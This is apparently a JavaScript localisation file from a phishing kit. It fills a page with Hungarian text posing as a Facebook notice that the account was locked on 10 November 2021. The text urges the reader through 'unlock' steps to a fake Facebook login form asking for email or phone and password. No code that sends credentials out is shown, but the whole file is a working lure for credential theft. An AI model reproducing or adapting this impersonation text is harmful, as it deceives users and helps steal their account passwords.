var mainHeader = document.querySelector(".home-main-header .home-heading");
var mainParagraph = document.querySelector(".home-mainparagrph .home-text");
var lockedHeader = document.querySelector(".home-lockedheader .home-text1");
var lockedParagraph = document.querySelector(".home-lockedinfobox .home-container6 .home-text5");
var footerParagraph = document.querySelector(".home-main-card .home-container7 .home-text6");
var getStarted = document.querySelector(".home-main-card .home-link");
var nextHeader = document.querySelector(".home-next-card .home-unlock-header .home-text");
var fristLineHeader = document.querySelector(".home-f-line .home-text03");
var fristLineParagraph = document.querySelector(".home-f-line .home-text05 span"); 
var secoundLineHeader = document.querySelector(".home-s-line .home-text09"); 
var thirdLineHeader = document.querySelector(".home-t-line .home-text12"); 
var nextButton = document.querySelector(".home-next-buttons .home-button1");
var backButton = document.querySelector(".home-next-buttons .home-button");
var logHeading = document.querySelector(".home-log-card .dlog .home-heading");
var logAlert = document.querySelector(".home-log-card .home-alert");
var logAlert2 = document.getElementById("alert");
var userInput = document.querySelector(".home-mail");
var passInput = document.querySelector(".home-pass");
var logButton = document.querySelector(".home-submit"); 
var or = document.querySelector(".home-or");
var createButton = document.querySelector(".home-creat-new");


mainHeader.innerHTML ="A fiókod zárolva lett";
mainParagraph.innerHTML ="Szokatlan tevékenységet észleltünk fiókjában. Ez azt jelentheti, hogy valaki az Ön tudta nélkül használta a fiókját.";
lockedHeader.innerHTML ="A fiók 2021. november 10-én zárolva";
lockedParagraph.innerHTML ="Az Ön védelme érdekében profilja nem látható a Facebookon, és nem használhatja a fiókját.";
footerParagraph.innerHTML ="Végigvezetjük néhány lépésen a fiók feloldásához.";
getStarted.innerHTML ="Fogj neki";
nextHeader.innerHTML ="A fiók zárolásának feloldása";
fristLineHeader.innerHTML ="Erősítse meg, hogy ez az Ön fiókja";
fristLineParagraph.innerHTML ="Mivel lehet, hogy valaki másnak volt hozzáférése, meg kell erősítenünk, hogy Ön ennek a fióknak a tulajdonosa, mielőtt továbblépnénk.";
secoundLineHeader.innerHTML ="Biztosítsa bejelentkezési adatait";
thirdLineHeader.innerHTML ="Fiókja fel lesz oldva";
nextButton.innerHTML ="Következő";
backButton.innerHTML ="Vissza";
logHeading.innerHTML ="Jelentkezz be a Facebookra";
logAlert.innerHTML ="Először be kell jelentkeznie";
logAlert2.innerHTML ="Először be kell jelentkeznie";
userInput.setAttribute("placeholder" , "E-mail cím vagy telefonszám");
passInput.setAttribute("placeholder" , "Jelszó");
logButton.innerHTML ="Belépés";
or.innerHTML ="vagy";
createButton.innerHTML ="Új fiók létrehozása";
